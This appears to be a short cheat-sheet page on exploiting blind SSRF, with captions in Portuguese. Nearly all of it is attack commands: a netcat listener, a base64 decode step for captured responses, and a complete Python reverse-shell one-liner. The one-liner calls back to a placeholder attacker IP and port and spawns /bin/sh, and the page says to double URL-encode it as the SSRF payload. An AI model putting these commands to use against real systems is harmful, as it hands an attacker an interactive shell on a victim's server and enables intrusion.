Blind SSRF Exploitation Example

nc -lvnp 9090

Iniciando um ouvinte netcat

echo """<B64 encoded response>""" | base64 -d

Decodificando a resposta codificada em base64

Carga útil do shell reverso (para ser URL codificado duas vezes)

export RHOST="<VPN/TUN IP>";export RPORT="<PORT>";python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

Last updated